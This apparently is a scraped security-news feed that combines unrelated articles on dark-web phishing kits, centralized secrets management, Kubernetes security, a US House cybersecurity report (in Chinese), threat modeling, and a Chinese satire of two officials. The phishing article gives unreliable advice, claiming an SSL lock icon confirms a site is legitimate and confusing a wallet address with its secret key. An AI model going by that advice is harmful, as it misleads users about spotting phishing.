Phishing attackers send out email blasts to large groups of people with the messages designed to look like they come from a reputable company, such as Google, Apple, or a banking or credit card firm. The emails will typically try to warn you about an error with your account and then urge you to click a link and log in with your credentials. Doing so will bring you to an imitation website where the attacker will attempt to steal your password, social security number, or other private data.

These days phishing attacks are becoming more widespread. One of the primary reasons is because of easy access to cybercrime kits on the dark web. With the hacker community growing, internet users need to take privacy seriously and remain vigilant against spam and other threats. Read on to learn more about this trend and how to protect yourself.

Dark Web Basics

The dark web, sometimes referred to as the deep web, operates as a separate environment on the internet. Normal web browsers, like Google Chrome or Mozilla Firefox, connect to the world wide web using the HTTP protocol. The dark web requires a special browser tool known as the TOR browser, which is fully encrypted and anonymous.


Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Image courtesy of Medium.com

Sites on the dark web cannot be indexed by search engines, so you’ll never stumble on that content through Google. When you connect through the TOR browser, all of your browsing traffic is sent through a global overlay network so that your location and identity cannot be tracked. Even IP addresses are masked on the dark web.

Hacker Markets

Much of what takes place in this cyber underworld is illegal or unethical in nature, and that includes the marketplaces that exist there. Think of these sites as blackmarket versions of eBay, where anonymous individuals can buy and sell illegal goods and services.

Recently, dark web markets have seen a surge in demands for cybercrime tools and utilities. Entire phishing kits are sold to buyers, which include spoofed pages that imitate real companies and full guides on how to launch an email phishing scam.


Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Image courtesy of Medium.com

When a spam email is sent out as part of a phishing scam, the messages are typically delivered through dark web servers that make it hard for junk filters to identify. In addition, the “From” address in the emails may look legitimate and use a valid domain like @gmail.com.

Phishing kits can be found for as less as two dollars, meaning that inexperienced hackers can launch a cybercrime effort with little funding or training. It’s interesting to note that personal data prices at the Dark Web supermarket range from a single dollar (Social Security card) to thousands (medical records).

Cryptocurrency Scandal

You should be on the lookout for phishing scandals related to any company or industry, but in particular, banking and financial attacks can be the most dangerous. If a hacker gains access to your credit card numbers or online banking password, then can commit fraud or even steal your identity.

The growing popularity of cryptocurrencies like Bitcoin and Ether have revolutionized the financial industry, but as a negative result of the trend, cybercriminals are now targeting these digital money systems. MyEtherWallet website , which allows users to store blockchain currency in a central location, has been victim to a number of phishing scams in recent months.


Dark Web Phishing Kits: Cheap, plentiful and ready to trick you
Image courtesy of MyEtherWallet.com

Because cryptocurrencies do not operate with a central bank or financial authority, you may not know what a legitimate email alert for one looks like. Phishing messages for MyEtherWallet will usually claim that there is an issue with your cryptocurrency account, or sometimes even suggest that you have a payment pending that needs to be verified.

Clicking on the link in the phishing email will launch your web browser and navigate to a spoofed page that looks like it is part of myetherwallet.com. However, the page is actually hosted on the hacker’s network and will feed directly into their illegitimate database. If you enter your private wallet address, which is a unique string of letters and numbers, the hacker can gain access to all of the funds in your account.

Preventative Measures

Phishing attacks are a type of cybercrime that targets individuals, so it’s up to you to be on guard for these messages and react appropriately. The first line of defense against phishing is to be skeptical of all emails that enter your inbox. Dark web hackers are getting better and better at imitating real companies with their spam and spoofing pages, so you need to look closely when examining the content. Always check the full URL of the links in email messages before you click one.

If you do get tricked and end up navigating to a spoofed page in your web browser, you still have a chance to protect yourself. All browsers support secure sockets layer (SSL) functionality and will display a lock icon or a green status bar at the top of the window when a website has been confirmed as legitimate. If you navigate to a webpage from an email that does not have a valid SSL certificate, you should close the browser immediately and permanently delete the email message.

The Bottom Line

Keep this in mind. As prices for phishing kits drop and supply increases, the allure of engaging in this kind of bad behavior will be too much to resist for an increasing number of people. Expect incidents of phishing attempts will increase. The general internet-browsing public should stay on high alert at all times when navigating their email inbox. Think first, then click.

Author Bio
Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Gary Stevens is a front-end developer. He’s a full-time blockchain geek and a volunteer working for the Ethereum foundation as well as an active Github contributor.

Read Next

Packt has put together a new cybersecurity bundle for Humble Bundle

Malicious code in npm ‘event-stream’ package targets a bitcoin wallet and causes 8 million downloads in two months

Why scepticism is important in computer security: Watch James Mickens at USENIX 2018 argue for thinking over blindly shipping code


Security Islands

$
0
0

The last decade has been an exciting time for the tech industry, with the advent of collaborative business practices like DevOps and modern tooling that enables us to go faster than ever. It’s made it really exciting to be part of a software team at a tech company and we’ve probably all heard the adage that “every company is now a tech company”.

There’s been an explosion of products on the market that are designed to help us achieve our business goals. But with the advent of these new workflows and tools, we’re beginning to identify additional risks that we need to mitigate if we’re going to protect our systems and our customers’ data.

In general, the modern pipelines we’ve created are well designed to improve flow and velocity and allow us to get new code rapidly built, tested, and deployed but are not always built for security. In fact, the threat models and vulnerabilities that need to be addressed expand.

One threat vector that we worry about in particular is exposed credentials and secrets, like those that are inadvertently shared in code repositories like GitHub or that may be exposed by vulnerabilities or over-privileging in the DevOps tools that have access to these secrets.

When you have all of these tools, and they each have their own mechanisms for managing security policy and access control, you end up with what we like to call “Security Islands”:

A security island is:

A tool or platform that comes built-in with its own security components (that manage secrets, access control, audit, compliance, etc) but that does not facilitate interoperability with other tools and/or aggregation of security policies, management, and audit data.

A security island is an isolated subsystem that makes it harder to manage the security of your system as a whole. This can be because the tool isn’t fully featured or isn’t interoperable but the end result is the same, that implementing security for the tools must happen piecemeal and without any centralized oversight.


Security Islands
Security Islands

When your systems are set up so that you’re forced to deal with security islands, you suffer from a lack of centralized audit and access control and it’s difficult to delegate authority to manage subsystems in any standardized way. You lack a centralized view of your entire security landscape, and it is increasingly difficult to manage at scale.

In addition, it’s possible to build human security islands. If security is too hard or complicated, teams will choose their own security tools and processes that are outside of official policies. In general this is often referred to as “Shadow IT”.

Getting to a better place

At CyberArk, we want to enable you to build a Continent of Trust that allows you to get away from security islands and instead weave your tools together in a way that connects them with your established systems of trust.

We’re not going to get away from having suites of disparate tools, but we can start to improve the experience of managing them by finding tools that let us tie them all together.

When you build a continent of trust, you get the benefit of centralized audit, access control, and administration. It’s easy to delegate authority and to manage at scale. You have the benefit of a centralized view of your overall security landscape and how the individual machines and services interact with each other.

In particular, to build a continent of trust for application privilege management, you need a system that lets you define your entire infrastructure, declare who and what can access which resources, audit all connections that are made, and monitor for unusual behavior.

In practice, you want the system that you use for centrally managing application privilege to enable you to:

Automate granting machine identity to applications and processes (like CI servers) Deploy applications so that they are prepared to seamlessly authenticate with the resources they need Centrally manage access control Reduce complications for developers so that Shadow IT is no longer necessary

On the Conjur team at CyberArk, our mission is to create such a centralized system for managing application privilege in dynamic environments. We provide integrations (like our Kubernetes authenticator ) to make it simple to bootstrap Conjur machine identity, and provide tools like Summon and Secretless Broker to simplify the process of connecting applications to the resources (like databases and APIs) that they need. We do this in a way that takes the onus off of developers as much as possible.

If you’re interested in learning more, please visit us atconjur.org or join us on Slack !

Exploring container security: This year, it’s all about security. Again.

$
0
0

Earlier this year at KubeCon in Copenhagen, the message from the community was resoundingly clear: “this year, it’s about security” . If Kubernetes was to move into the enterprise, there were real security challenges that needed to be addressed. Six months later, at this week’s KubeCon in Seattle, we’re happy to report that the community has largely answered that call. In general, Kubernetes has made huge security strides this year, and giant strides on Google Cloud. Let’s take a look at what changed this year for Kubernetes security.

Kubernetes attacks in the wild

Where developers go, hackers follow. This year, Kubernetes graduated from the CNCF , and it also earned another badge of honor: weathering its first real security attacks. Earlier this year, several unsecured Kubernetes dashboards made the news for leaking cloud credentials. At the time, Lacework estimated there of over 20,000 public dashboards, 300 were open without requiring any access credentials. (Note that Google Kubernetes Engine no longer deploys this dashboard by default .) Elsewhere, attackers added binaries to images on Docker Hub to mine cryptocurrency , which were then downloaded an estimated five million times and deployed to production clusters.

The majority of attacks against containers, however, remain “drive by” attacks―where an attacker is only interested in finding unpatched vulnerabilities to exploit. This means that the best thing you can do to protect your containers is to patch: your base image, your packages, your application code―everything. We expect attackers to start targeting containers more, but since containers make it easier to patch your environment , hopefully they’ll have less success.

Luckily, we also saw the community responding to security threats, by donating multiple security-related projects to the CNCF including SPIFFE , OPA , and Project Harbor .

Developing container isolation, together

Isolation was a hot topic for the container community this year, even though there still haven’t been any reports of container escapes in the wild, where an attacker gains control of a container, and uses it to gain control of other containers on the same host. The Kata Containers project kicked things off in December 2017, and other sandboxing technologies quickly followed suit in 2018, including gVisor and Nabla containers . While different in implementation, the goal of each of these technologies is to create a second layer of isolation for containerized workloads and bring defense-in-depth principles to containers, without compromising performance.

Container isolation is frequently misunderstood (after all, they don’t contain), and lack of isolation has been a primary argument against adopting them. Unlike virtual machines, containers don’t provide a strong isolation boundary on par with a hypervisor. That makes some users hesitant about running multi-tenant environments―deploying two containers for different workloads on the same VM―because they are worried that the workload in one container affecting the other. To address this, Kubernetes 1.12 added RuntimeClass, which lets you use new sandboxing technologies to isolate individual pods. RuntimeClass gives you the ability to select which runtime to use with each pod, letting you select hardening runtimes like gVisor or Kata depending on how much they trust the workload . With this tooling, the primary argument against containers is now one of its greatest strengths.

Protecting the software supply chain

At Google Cloud, we focused our efforts on securing the software supply chain―protecting your container from the base image, to code, to an application image, to what you deploy in production. Recently we released two new products in this space: Container Registry Vulnerability Scanning scans your images for known vulnerabilities; and Binary Authorization lets you enforce your policy requirements at deployment time. Both of these products are currently in beta.

Since a container is meant to be immutable, you’re constantly redeploying, and constantly pushing things down your supply chain. Binary Authorization gives you a single enforcement point where you can dictate what’s running in your environment. In addition to the GCP-hosted product, we also published an open-source reference implementation of Kritis , to ensure that your containers are scanned and patched for any known vulnerabilities before you let them into your environment.

Hardening GKE and its network

We keep GKE up to date with Kubernetes open-source releases, but we also introduce new features and new defaults to help you better protect your clusters. We made huge headway in network security recently, namely with the general availability of Private Clusters and Master Authorized Networks . Together, these help you further limit access to your cluster by malicious attackers who are scanning IP addresses for vulnerabilities. Now, you can restrict access to your cluster’s master to a set of whitelisted IP addresses, and can further ensure that your cluster’s nodes only have private IP addresses. And since GKE now works with shared Virtual Private Cloud , your network team can manage this environment directly. To learn more about GKE networking and network security, see the GKE network overview .

Then, in the small-but-mighty category, we turned node auto-upgrade on by default in the GCP Console. Unpatched environments are an easy target for attackers, and it only takes one missed security notice or delayed patch to be suddenly vulnerable. Node auto-upgrade delivers security patches automatically to keep your node up to date. Note that on GKE, Google manages and patches the control plane. While you probably didn’t notice it, our team has been very active patching GCP and GKE for linux and Kubernetes vulnerabilities this year, most notably last week !

In addition to new network security features, we are always striving to improve GKE’s default security settings, so you can implement security best practices without having to be a security expert. We’ve consolidated our hardening advice into a single guide that’s easy to follow, and noted when we’ve changed defaults. Note that this is an easy link to share with auditors.

There’s so much more we want to do and we’re going to keep on keeping on, so that 2019 can be all about security too. If you’re at KubeCon this year, check out some of our container security talks:

How Symlinks Pwned Kubernetes (And How We Fixed It) Tues Dec 11th, 10:50-11:25
Recent Advancements in Container Isolation Tues Dec 11th, 1:45-2:20 This Year, It’s About Security Tues Dec 11th, 4:30-5:05 So You Want to Run Vault in Kubernetes? Wed Dec 12th, 11:40-12:15 Navigating Workload Identity in Kubernetes Wed Dec 12th, 4:30-5:05 Shopify’s $25k Bug Report, and the Cluster Takeover That Didn’t Happen Thurs Dec 13th, 4:30-5:05

Hope to see you there!

美众议院公布改革美国网络安全的新思维与优先项

$
0
0

美众议院公布改革美国网络安全的新思维与优先项

2018年12月7日,美国民主党参议员、参院情报委员会成员马克华纳在新美国安全中心发表演讲,批评美国政府在网络安全上投入不足,建议进行美国内网络安全大整顿。同日,美众议院能源和商业委员会监管和调查小组发布报告《网络安全战略报告》,呼应了华纳的主要观点,认为当前美国的网络安全举措并未跟上互联网的发展,传统的信息技术策略在应对不断增长的网络安全事件中收效甚微。基于此,该小组基于过去几年的听证会、研究报告、圆桌研讨会以及实际案例的研究,提出来两个关键性问题:(1)网络安全事件的根本原因是什么?(2)若传统IT策略被证明无效后,组织(包括企业或政府机构)该怎样增强其网络安全能力?围绕这两个问题,报告梳理出六点网络安全概念与六项网络安全优先项。

一、建立普遍接受的协同披露程序:因为总是存在未知的未知数 概念1:网络安全中总是存在未知的未知数

根据小组组委会观察所得,在过去几年发生的网络安全事件中,存在着一个普遍现象,即遭遇网络安全事件的企业或机构普遍都不是自己发现的,包括谷歌、因特尔、通用汽车、强生甚至包括美国国防部都是通过外部机构发现自身漏洞的,乍一看这似乎是企业或机构不负责任,这实则是由现代机制的复杂性所决定的。现代信息系统与网络包含成百上千个单个的硬件和软件,每个硬件或软件又包括数十个软件库或数千行代码,这些都是潜在的漏洞衍生地,且每个网络的具体组件又千差万别,当一个网络连入另一个网络时,又产生新的漏洞,从这个角度上来说,网络安全总是存在未知的未知数。

基于这样的认知,一个组织能做什么呢?期望组织能够辨别所有未知的未知是不可能的,只有一个方法能解决这个问题,这也是被许多网络安全事件所证明过的,那就是第三方披露。简而言之,即使一个组织并不知道它不知道的事,但总有其他人知道,而且愿意合作。

优先项1:建立普遍接受的协同披露程序

协同披露是合作进行漏洞发现与处置的进程。该过程始于“发现者”(既可能是独立的个人,也有可能是市值上亿的企业)发现网络安全漏洞后及时通知漏洞负载者,负载者随即采取措施进行消控,并协商公布漏洞的过程。协同披露程序将为组织带来许多益处,一方面,该程序允许企业或机构寻求外部帮助来发现未知的未知,避免因漏洞未补而发生的数据泄露等网络安全事件;另一方面,该程序还可保护“发现者”免受刑事惩罚,激励他们积极向漏洞所有者报告。此外,协同披露程序通过机制建设使得网络安全漏洞在造成大范围的负面影响之前被发现和修复,最大限度地维护了社会安全。

二、引入软件物料清单:因为你不能保护你不知道你所拥有的 概念2:你不能保护你不知道你所拥有的

“心脏出血”与“想哭”病毒两大网络安全事件中,组织并不是不知道哪项软件具有漏洞,而是不知道哪项技术里包含具有漏洞的软件,这揭示了一个普遍现象,即组织缺乏对其环境中的技术的可见性,也就是说,在网络安全中,你不能保护你不知道你所拥有的。在这相隔三年的两件网络安全事件发生中,组织面临着同样的挑战,即事件发生后,各个企业和机构都急于去检查自身是否受影响,但由于不完整的技术物料清单,他们并不知道他们的系统与设备是否遭受到感染;再加上许多技术自带 “黑箱”性质,使得大部分企业和机构对于他们运行的软硬件并不了解,这种不可见性广泛存在,迫使组织盲目地依赖供应商提供的零星的、不透明的指南来减轻网络安全漏洞。对此,打开技术的黑箱成为当前网络安全工作的重中之重。

优先项2:引入软件物料清单(software bill of materials,简称SBOM)

物料清单(bill of materials,简称BOM)概念早已有之,并广泛存在于其他领域,主要是指是描述企业产品的总装件、分装件、组件、部件、零件、直到原材料之间的结构关系,以及所需的数量。报告引入软件物料清单,即详细列出技术的硬件、软件以及其他相关的组件。引入SBOM具有两大好处:一是允许组织基于已知的漏洞信息作出购买和使用技术的决定;二是当新漏洞被发现时,组织可借此快速定位到漏洞的位置并迅速止损。简而言之,SBOM可以帮助组织打开当前的技术黑箱,以完整评估他们的风险,更详细地了解组织存在的网络安全漏洞。

三、支持开源软件(OSS):因为软件不再是编写的,而是组装的 概念3:软件不再是编写的,而是组装的

开源软件越来越普及,据公开数据表明,目前78%的企业都运行在开源软件上,从这个角度上说,软件不再是编写出来的,而是组装起来的。在这样的情况下,每块组装软件的“砖”就变得非常重要。

优先项3:支持开源软件

支持开源软件并不是一项新的倡议,全球领先技术企业目前普遍都在为开源软件生态系统提供资金和其他支持,鼓励其员工为开源软件做贡献,甚至开源了他们自己的一些代码,以便更好地提升软件质量。这些行动极大地提升了开源软件生态系统的整体质量,他们意识到开源软件不仅是一项共享的资源,而是互联网基础的重要组成部分,增强其中一个就是增强另一个。因此对于那些希望以较低成本改善网络安全的企业来说,这类投资能够带来最高的投资回报率。

四、完善通用漏洞披露(Common Vulnerabilities and Exposures,简称CVE)程序:因为必须要有一种共同的网络安全语言 概念4:必须要有一种共同的网络安全语言

CVE主要是收集各种网络安全漏洞并给予编号以便于公众查阅,目前由美国非营利组织MITRE与国土安全部联合运营,在过去20年为超过100000个漏洞提供了唯一的标识符。在当前世界中,一件网络安全事件可能在几分之一秒内发生,CVE程序能够及时识别漏洞,这对现代网络安全实践至关重要。目前,CVE已经成为一种网络安全的通用语言,它不仅为政府服务,同时还是现代网络安全建设的基石。但是目前CVE很难跟上漏洞曝光的速度, ID分配延迟了数周甚至数月,一些漏洞甚至被认为超出了CVE的范围而被拒绝标识,这对网络安全行业产生了重大的负面影响,网络安全中的共同语言正在消失。

优先项4:完善CVE程序

组委会认为,CVE是现代网络安全实践的基础,也是现代网络安全从业人员使用的共同语言,使用CVE有利于更好地理解和分析网络安全态势。但不稳定的资金支持与管理机制是当前CVE弊端存在主要原因,对此,报告提出两点建议:国土安全部将CVE从项目融资模式转变为固定项目;国土安全部和MITRE定期对其进行审查。

五、实施技术生命周期支持战略:因为数字资产比物理资产老化速度更快,更难预测 概念5:数字资产比物理资产老化速度更快,更难预测

所有的网络安全事件都具存在一个共同现象,即都是针对陈旧落后技术的攻击,“想哭”病毒就是因利用了一项已有30多年历史的协议而产生的。而且目前存在这样一个趋势,许多恶意软件拥有者试图利用“漏洞工具包”,将多个漏洞漏洞组合在一起,以试图攻击任何未打补丁的设备。当然,这与技术发展紧密相关,各组织不断寻求更新和更先进的技术,以便更好地执行其任务,因此随着时间的推移,陈旧落后技术得到越来越少的关注,从这个意义上说,数字资产的老化速度更快,也更难预测。

优先项5:实施技术生命周期支持战略

老旧技术的问题不仅仅是技术问题,而是几十年遗留的老问题,因此简单停用老旧技术并不实际,而是将其置于“生命周期支持”的语义下对其进行全面审查,这就需要组织回答一些基本问题,即他们会花多少时间来开发和维护技术,老旧技术必须被全部替换吗?解决支持生命周期问题需要合作、创新与妥协,技术开发人员需要为他们开发的产品提供有保障的最小生命周期,用户也必须接受随着使用年限增长逐渐淘汰技术,无论他们的物理性能是否还处于较好的状态。此外,技术发展战略也需要重新审查,如是否需要将物理资产与数字资产相区分,即一种资产的过时并不一定带来另一种资产的过时,企业是否应该转向技术租赁模式,而不是购买模式,以便制造商能够更轻松地使用全新的、安全的技术替代陈旧的、易受攻击的技术等。

六、强化公私合作模式:因为网络安全需要“全社会”的路径 概念6:网络安全需要全社会的路径

目前,政府机构、企业和个人都已经意识到网络安全的风险,如法律要求政府机构必须满足某些网络安全标准,企业也在不断寻求创新的解决方案,消费者个人也会从网络安全指南中寻求建议以保护自身个人信息等,但是这些主体都是在寻求自身免受网络安全威胁,因而效果不佳。网络安全是一个共同的问题,互联网自身的设计就决定了网络安全的关键在于合作,特别是当前许多私营部门运营着大部分的互联网关键基础设施,因此网络安全维护需要一种“全社会”的方式,在这种方式中,公共和私营部门的个人和组织都扮演着至关重要的、不可或缺的角色,而不是口号。没有合作,许多网络安全战略将会彻底失败。

优先项6:强化公私合作模式

公私合作模式在六个相互依赖的优先项之间建立了一个积极的反馈循环,以提高社会整体的网络安全能力。美国政府通过总统政策指令21(PPD-21)建立了关键基础设施保护中的公私合作模式,PPD-21指定了三个最关键的角色:部门特定机构(SSAs)、负责监督和指导其部门;部门协调委员会(SCCs),由私营部门代表组成的自愿团体;信息共享和分析中心(ISACs),为部门成员之间共享信息的官方论坛。虽然这些部门因太学术化而遭受批评,但是加强公私合作模式却极大依赖于上述部门,对此应加大对上述部门的支持力度。

在网络安全越保护越不安全的背景下,该报告回到本源问题探寻解决之道,并有针对性地提出新理念,以及具有可操作性的优先项,体现出了较强的务实与创新的特点,对我国网络安全建设具有借鉴意义。

下载完整报告:https://energycommerce.house.gov/wp-content/uploads/2018/12/12.07.18-Cybersecurity-Strategy-Report.pdf

声明:本文来自中国信息安全,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

What all Developers Need to Know about: Threat Modeling

$
0
0

― This post is part of a series of blog posts about all kinds of Security topics for Developers ―

Threat modeling is a process which far too few developers know about. It is a process that does what the name suggests: It helps you to model all threats to your application. Basically you make a list of threats, but in a structured way, such that you can assess the risks, and decide what to do about them.

Why do I need to do this?

I guess you can imagine the ‘why’, but since not many developers use threat modeling, I’ll try to explain it nonetheless. First of all, if you don’t know which threats there are for your application, you cannot do anything about them. It’s always better to know in advance and decide you accept the risk, then it is to regret after you lost half of your customers because of a security breach.

Although this is a security blog, and security is perhaps the most important reason for threats, issues can also occur because of more natural causes, like power outages, a flooded server room, or a disadvantageous bus factor . Those can be serious threats to your project too, and therefore to your company.

The last reason to do this, is simply because it’s fun to do. It fits the type of developer humor to poke holes in their own creations through all kinds of unrealistic scenarios. But while doing some of the brainstormy steps, you’ll also come across more realistic threats. We noticed that when someone came up with a totally outrageous and silly idea to extra data from our system, other people noted that it wasn’t so farfetched after all, and sketched out a quite reasonable approach to attack us.

When to do the modeling?

Typically, the best moment to do threat modeling is at the beginning of a project, but in practice you can choose any moment. Better to do threat modeling halfway or at the end, than never at all. An advantage of doing so near the end of the project is that you know the architecture and all the data flows much better, so it will be easier. A disadvantage of course is that it may be more work to fix bad design decisions.

If you’re new to threat modeling, I would still recommend to do your first session on an existing project. That makes it a lot easier to ‘try’ a threat modeling session and familiarize yourself with all the steps. You have a much clearer picture of all the assets and flow of data and probably that makes it a bit easier to think about the risks. Once you know the process, you can try this out in a new project to address the threats already in the design phase.

Over time you will notice you already take into account many threats while thinking about the initial design of a new feature.

Let’s get started

There’s different ways to approach the threat modeling session, and it totally depends on your company. If you’re in a big company, probably there’s already a strict formal process for doing threat modeling. Therefore, I’ll assume smaller companies or individuals who are new to threat modeling. OWASP has a nice cheat sheet for this, although it seems a bit long and abstract at first. I find the steps in decomposing and modeling the system the most useful.

I’ll discuss the relevant steps in more detail, because I guess that’s the most practical guideline for others to get started.

Identify the trusted boundaries of your system

It is important to know the boundaries of you system, because you cannot control everything. E.g. while the cookie store in the user’s browser contains sensitive data which is part of your system, you cannot control which browser the user has or how they use it. You can however control whether you use cookies at all, or which cookie flags you use to secure them. So, the choice where the boundaries lie is not always trivial.

This step will likely already cause some discussion, which is good. Here’s some of the things we consider:

Do we only look at software, or do wo also include the infrastructure? Should we include the reverse proxies or the firewall? What about our orchestration software? It’s managed by another team, so it’s mostly out of reach for us.

Often it doesn’t really matter what you include, as long as there’s consensus in the team, to avoid unnecessary discussion later. In later steps you may find that you still want to reconsider the boundaries. That’s fine, but if you do, don’t forget to look at the steps in between to see if the changed scope influences them.

Add actors

Perhaps a bit boring, but it’s important to know who are the users or actors in your system. These can be the regular end-users or administrators with browsers, but also hackers with apps or other tools. And what about those disgruntled colleagues? Missing a group of actors means you will probably miss a whole category of threats too, so make sure you don’t miss anyone. You may even want to split the group of hackers into script kiddies, professional hackers and governments.

Add information flows

Here we’re going to make a list of all the different types of data that flow through the system. E.g. you can make a list of all types of authentication tokens and cookies. For each piece of data, you’ll want to know where it goes. What components does it touch? This is important to later find out where the data can leak. The more components use the data, the more opportunities for a hacker to get access. E.g. session cookies are usually not needed behind your authentication gates, but often they are still available.

For each type of data, there may be different flows, depending on the situation. E.g. our Authentication service creates the Sessionids, but after creation they flow both to our Session store and to the cookie store in the user’s browser. Also, for each request from the user’s browser, the cookie is sent along and goes through several components again.

It may happen that already during this step you see a flow that makes you frown. Although we’re going to look at threat assessment in a later step, you might want to take notes here already. We find that while creating the information flows, we came up with half the threats that were on the final list. So, this is where the creativity starts.

Perform threat assessment

If you didn’t do so yet in the previous step, now is the ‘official’ moment to look at the information flows. For each type of data, for each flow, see if there are opportunities for any of the actors to get hold of some valuable information.

You may also include ‘threats’ like losing data after a disk crash, because of a lack of redundancy or backups.

Add a probability value to each threat

Now that the list of threats is complete, we can have a look at their likelihood. Maybe you included some of those very unlilely, improbable or exceptional situations that will only occur when Jupiter, Pluto and Proxima Centauri b are in 1 line, on Christmas eve. You can mark those as ‘low’ probability.

Others may be more likely, like developer colleagues that stick some new and shine library into your code, including backdoors.

Add a value for the impact of each threat

Whatever the value of the probability, suppose this threat really becomes reality. What would be the impact? Would the company loose a 100 dollars? Or would the company go bankrupt? It helps if you can really put a number to the impact, but again‘low’, ‘medium’, ‘high’ suffices.

Manage the risks

美日两国的网络安全专家,才是真正不懂网络的胖子

$
0
0

2016 年里约奥运会上,不熟悉大陆乒乓球队的台湾网友将教练刘国梁认成了官员,觉得全场就他不懂球。作为曾经的国乒一哥大满贯选手,刘国梁当然不是一个不懂球的胖子。


美日两国的网络安全专家,才是真正不懂网络的胖子

虽然台湾网友在这件事上闹了笑话,但是在全世界范围内,什么都不懂却身居高位指手画脚的事还真的不少。

就拿网络安全来讲,美日两国近几个月接连爆出各自的网络安全顾问不仅不懂网络甚至不太会用电脑。


美日两国的网络安全专家,才是真正不懂网络的胖子

出生于 1944 年的鲁迪朱利安尼现年 74 岁,毕业于纽约大学法学院曾任纽约市长,因在 911 事件中所表现出来的突出领导力而被称为「美国市长」。

虽然这份履历十分出色,但出身联邦检察官学习法律的鲁迪朱利安尼却在川普政府中担当了网络安全顾问一职。


美日两国的网络安全专家,才是真正不懂网络的胖子

而这位顾问也并没有费力去证明自己在网络安全领域的技术程度,鲁迪本人在采访中表示,他所理解的网络安全顾问的主要任务就是:

寻求私营企业的帮助,将企业领导人和技术专家聚集起来,安排其与总统见面,然后了解相关事务的进展。


美日两国的网络安全专家,才是真正不懂网络的胖子

这一做法虽然与大众所期待的网络安全顾问有所出入,但至少对外行来说也不失为一种有效的工作方式。随着时间的推移,美国民众却发现这位网络安全顾问不仅不懂尖端技术,在某些常识上甚至可能还比不上普通人。

11月30日,一如自己总统一样,鲁迪又在推特上进行国务处理。而不巧的是,由于他在编辑推文时前后两句话之间忘记加上了空格,因此不甚形成了一个超链接――G20.In。


美日两国的网络安全专家,才是真正不懂网络的胖子

虽然是一个空链接,但却迅速被好事者抓住了把柄,网友立刻对这个超链接进行了占领,注册了该域名并在指向网站中进行了信息填充。直到现在这个网页上还挂着「川普是国家叛徒」的大字报。


美日两国的网络安全专家,才是真正不懂网络的胖子

如果说这只是一次不小心,那不懂网络的鲁迪还能洗白,但其后他的一系列操作才真的暴露了自己有多不适合现在的岗位。在这件事出来之后,鲁迪第一反应并不是删除推特并进行解释,而是第一时间发了另一条推特。

他表示这一切都是推特官方的阴谋。推特高层里有许多川普 Anti 粉( 黑子 ),他们故意在自己的这条推文里插入这种反川普的信息。并且,他气势汹汹的说,时代杂志的人也是差不多的讨厌鬼。


美日两国的网络安全专家,才是真正不懂网络的胖子

▲推特让那些人把反总统的言论安插进了我的推文里……

或许鲁迪自认为抓住了反政府的「白左」精英把柄,但网友们显然不买账。他们激情转发这条推特并给出了各式各样的反讽段子。


美日两国的网络安全专家,才是真正不懂网络的胖子

截止到现在鲁迪还未给出进一步的回应,也许他的手机和川普的一起被锁了起来。建议反戴 AirPods 耳机冷静一下。


美日两国的网络安全专家,才是真正不懂网络的胖子

▲图左:鲁迪朱利安尼

作为美国的友好国日本,同样也在网络安全这一领域的人事任命上非常不走心。不过与鲁迪的掩饰不同的是,日本的网络安全大臣樱田义孝显然已经放弃抵抗了。

他在 11 月 14 日的《网络安全基本法改正案》的审议会上公开表示自己其实根本不懂电脑,也不知道 USB 是什么。


美日两国的网络安全专家,才是真正不懂网络的胖子

▲樱田义孝阐述对USB的理解 图源:网络

樱田义孝的此番坦白却没能为他赢来喝彩,反而遭到了台下议员们的接连质询。在轮番攻击之下,樱田义孝解释道,现代手机已经十分方便了他更习惯用手机办公,电脑什么的就让助理帮忙操作就好了,他从 25 岁开始就是这么混过来的。


美日两国的网络安全专家,才是真正不懂网络的胖子

他的这一言论在日本以及国内都引起了不小的讨论,樱田义孝本人似乎觉得不妥,于是在之后 22 日的会议上又对自己进行了一次补刀。

他辩解说自己也有尝试过去电脑培训班,但实在是太忙了所以没怎么学会。因为没学会,所以让手下的人帮忙操作一下电脑也没什么大不了的。


美日两国的网络安全专家,才是真正不懂网络的胖子

虽然美日这两位网络安全方面的重臣相继出事引发民众吐槽带来了很多欢乐,但却没有人能深刻明白到樱田义孝和鲁迪朱利安尼的良苦用心实在可惜。

作为网络安全大臣、顾问首先要务就是维持网络安全,如果不用电脑就意味着不用受到黑客的攻击了,不懂网络的话即使被攻击了也看不出来,计划通……


美日两国的网络安全专家,才是真正不懂网络的胖子
Viewing all 12749 articles
Browse latest View live